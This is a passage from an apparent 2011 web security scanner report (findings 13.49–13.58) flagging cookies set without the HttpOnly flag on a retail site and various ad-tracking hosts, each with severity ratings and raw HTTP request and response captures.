Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 302 Moved Temporarily
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Location: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:09:50 GMT
Connection: close
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=5172be2c2b30d380a33b6207078d71312efa223a5124b4964dd08c16; Path=/
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 02:09:49 GMT


13.49. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/search.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID and TS1c138a. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function. Both cookies are re-issued here over HTTPS, again without the Secure attribute.

Request

GET /sitewide/includes/header/search.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:20 GMT
Content-Length: 1134

<script type="text/javascript" charset="utf-8">
                   typeAhead('#search-input-field',5);
               </script>
           <form action="/search/results.jsp" class="hasrequired header-search" method="get"><input value
...[SNIP]...

13.50. http://a.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: evo5. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=088 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 02:01:04 GMT
Last-Modified: Sat, 14 May 2011 02:01:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7Co7sHAo0WiNAkV5aQXuATwLKnqcS7CiZMwsLzz4KjZ0u0qp3pkq8dEee9axkAPKMyKcjX7b%2Fj8u2pvMUKubOFmSXM7%2Bt0a6Ux23b%2BYSj08pAlornvRey34GAuBxIpydsc7XqPU6aRPmgH9%2FnsPER%2FdoRGgEVvdULoFhC9iH3sp31Vly6PXTxTMEfNAbPLdxsJgZThArgAu2FZdW2nOze9yxGDOI1muuzrVlGdOTN11V5CAWr3jbZbP%2FF39U8YDAxRZc6jF8SPBs2BGaJOfh52Yi4uav1ONnUmuw5m4GOxMErzgQqodDYqlk5V7GpMFF50jq1p9mFO%2BSMYIMzW0X2qY1bb0xTxY0WiV%2F05PStbeFKyfBPimlixNC1sOQBbQ3jEUFNFInZmY%2FCdeaP1REAfPTGTOBq3PsAoQ2Bd15zuYVt3hE%2BnRckFXgnwD2d8%2FOWdLYlMTkRkrg4XzCOJBw8F0TGKkTDwQxDH89mj%2FE24rfR9mqYMWMIDpv46H009GcZcooUqNc3iHid7BJ7%2BqsPj6hUcHS5wf1QjQ%2FsVI%2BkVsKU%3D; expires=Tue, 15-Nov-2011 02:01:04 GMT; path=/; domain=.netmng.com
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8



13.51. http://a.rfihub.com/ca.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: m, u, f and e. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ca.gif?rb=398&ca=20472990&ct=REPLACE_ME_WITH_YOUR_CACHE_BUSTING HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=c615304299134845020; j=c615304299134845020; o=1-InfNhMB4STMs; p=1-InfNhMB4STMs; r=1305510033558; m="aAEeXBemQ==AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY="; u="aAB7h5nqw==AI89bBrQ==AAABL_aCVOI="; f="aABXkMDrQ==AK1305510033AB4AAABL_aCVOE="; e=co

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: m="aAF25BkaA==AI20472990AAABL_aCnLI=AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: u="aAB7ilFUA==AI89bBrQ==AAABL_aCnLI=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: f="aABTNDn0w==AK1305510033AB5AAABL_aCnLE=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: e=co;Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Cache-Control: no-cache
Location: http://cm.g.doubleclick.net/pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0
Content-Length: 0


13.52. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ANON_ID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=294813&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ainrPgt3erxPAxvPAB9VUZd5PbMJ94w4LX6qVV0Zcrx58XSW0MmLTRXaVdrFwaTw8GvrZb3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a9nrejs2aFvDAJsbYZd7FMh2nQCFRDH0fa1otdZaZbc1scXdKPKEpkJfRWcSiSsMhXqubGvEyor; path=/; domain=.tribalfusion.com; expires=Sun, 14-Aug-2011 01:55:18 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

13.53. http://action.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: clid, orblb, rdrlst, sglst and vstcnt (the adh cookie in the same response is being cleared: empty value with an Expires date in 1970). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1628 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B01CE493D943F3A2256745B41EB14658; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ezk00b3r0a0l0a50b; orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; rdrlst=4090spbll9m03000000053r050d6hll8nk20000000a3r0a15ztll9l28000000063r060dlzll9l28000000063r0601hvll8nk20000000a3r0a16iell9m03000000053r050msvll9m03000000053r0501g3ll8nk20000000a3r0a0e6mll9m03000000053r05; sglst=2050s90ill9m03000m30053r050l05505dlell9l28000000063r060l065065msll9l28000000063r060l06506c24ll9l28000000063r060l065061jzll8nk200z2400a3r0a0l0a50a; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02ezv00c3r0b0l0b50c; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: orblb=2ll8nk2031zw10u0200z2400yjk2gu10u0200z1q00yg11y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000063r060d6hll8nk20000000b3r0b0dlzll9l28000000073r0715ztll9l28000000073r0701hvll8nk20000000b3r0b16iell9m03000000063r0601g3ll8nk20000000b3r0b0msvll9m03000000063r060e6mll9m03000000063r06; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000me0063r060l06506dlell9l28000000073r070l075075msll9l28000000073r070l07507c24ll9l28000000073r070l075071jzll8nk200z2f00b3r0b0l0b50b; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:54:17 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:54:16 GMT

GIF89a.............!.......,...........D..;

13.54. http://ad.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: T_82oo and rth (T_25qb is being cleared in the same response: empty value with an Expires date in 1970). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=598&id=255&format=1305510841 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv; T_25qb=77k%3Ayl0%3A1; rth=2-ll8nk2-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Mon, 16 May 2011 01:57:53 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_25qb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_82oo=jd9%3Az8g%3A1; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-jd9~z8g~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Tue, 15-May-2012 01:57:54 GMT; Path=/
Content-Length: 0


13.55. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: bh and BX. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=601754&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=c0ff5dec-7e12-11e0-9b08-cbf09fb9c5c1&_hmacv=1&_salt=1421878035&_keyid=k1&_hmac=379127292d98a559f1aee3132eca164a08138d6d; ih="b!!!!#!1mH9!!!!#=!i98"; vuday1=%)0sHNDf0(n(#JG; pv1="b!!!!#!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~"; lifb=@Aum6=mRs]u7k!H; bh="b!!!!d!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!#=!iHg!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!#=!iHg!!i5*!!!!#=!iJN!!itb!!!!$=!iJp!!jB6!!!!#=!iK0!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!!u*$!!!!#=!iJG!#$gc!!!!#=!iHg!#$k4!!!!#=!iHg!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#8>+!!!!#=!i9S!#:<o!!!!#=!iJ:!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!#=!iJT!#b?f!!!!#=!iHc!#b?y!!!!#=!dNx!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!#=!iHj!#q4c!!!!#=!iHl!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!e!!!?J!!!!$=!iJp!!(1-!!!!#=!iJp!!/GK!!!!#=!iJp!!/GR!!!!#=!iJp!!/i,!!!!#=!i9E!!2)!!!!!#=!i9E!!4Rk!!!!#=!iBY!!<A!!!!!#=!iHg!!J<J!!!!$=!iJp!!J<K!!!!$=!iJp!!J<S!!!!$=!iJp!!Kc5!!!!#=!Y*a!!OgU!!!!#=!i9E!!Z+p!!!!#=!c8X!!]lj!!!!#=!iHg!!i5*!!!!#=!iJN!!itb!!!!$=!iJp!!jB6!!!!#=!iK0!!rms!!!!#=!c8X!!t^6!!!!%=!Tiu!!u*$!!!!#=!iJG!!x<K!!!!#=!iR#!#$gc!!!!#=!iHg!#$k4!!!!#=!iHg!#*Xa!!!!#=!dNx!#+]S!!!!#=!i9E!#4^h!!!!#=!dNx!#6Ty!!!!#=!dNx!#8>+!!!!#=!i9S!#:<o!!!!#=!iJ:!#C@M!!!!#=!iK@!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTH!!!!$=!iJp!#MTI!!!!$=!iJp!#MTJ!!!!$=!iJp!#Mu_!!!!#=!eq^!#Nyi!!!!#=!eq^!#QfM!!!!#=!eq^!#SV*!!!!#=!i9E!#Sub!!!!#=!dNx!#Tw/!!!!#=!eq^!#UDQ!!!!$=!iJp!#UW*!!!!#=!dNx!#XV)!!!!#=!dNx!#XjF!!!!#=!eq^!#]<e!!!!#=!iHj!#^0%!!!!#=!i9E!#a]3!!!!#=!iJT!#b?f!!!!#=!iHc!#b?y!!!!#=!dNx!#biv!!!!#=!iK0!#dCX!!!!%=!c>6!#e9?!!!!#=!dNx!#g/7!!!!#=!i9E!#pI<!!!!#=!iHj!#q4c!!!!#=!iHl!#qVJ!!!!#=!eq^!#r-[!!!!#=!c8Z!$(Z`!!!!#=!iJp!$)ZR!!!!#=!i9S!$,gE!!!!$=!iQt"; path=/; expires=Wed, 15-May-2013 01:53:56 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:53:56 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.56. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rb2, ut, vsd and rb. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=4dd07bc8-e97b-118c-3dec-7b8c5c306530 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; rb2=ChMKBjY4NDMzORi49477EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@1@4dd083b0@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:58:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORj20p_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:58:26 GMT
Set-Cookie: vsd=0@1@4dd084c2@www.imiclk.com; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:58:26 GMT
Set-Cookie: rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.57. http://ads.lfstmedia.com/mark/CRITEO_INCL_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lfstmedia.com
Path:   /mark/CRITEO_INCL_US

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: adm_8vhk7crnCultFM-9vPQgMQ. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mark/CRITEO_INCL_US?time=$$timestamp$$ HTTP/1.1
Host: ads.lfstmedia.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trx=ip3281-34Vp1f6RBda0qYQkS59hcA; adu=kFfviwdBGAG2fdQv1i6avvzeHSzTq9cE

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 16 May 2011 02:03:00 GMT
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: adm_8vhk7crnCultFM-9vPQgMQ=y1CPY_PMEQyXEGd0ba8GKWzq0JvFcZ8d2in7RLYOb7s+zdbkfv7ihR8pX3gyu+6g; Domain=.lfstmedia.com; Expires=Thu, 13-May-2021 02:03:00 GMT; Path=/
Pragma: no-cache
Cache-Control: must-revalidate
Cache-Control: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 43
P3P: CP="CAO PSA OUR"

GIF89a.............!.......,...........L..;

13.58. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsiPus_L-X0 and rsi_us_1000000, both with Max-Age=1009152000 (about 32 years); the four Set-Cookie headers before them clear the earlier rsi_us_1000000 and rsiPus_Ue6V cookies on both the /adserver and / paths. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=47C4A5B52F56DA1048BE0364F22EE23B&rsi_site=7CF6289AC01B12B6FAA4EB07CBB7EE34&rsi_event=D00B721BDB5235B5FF65F9D8E524EF85 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
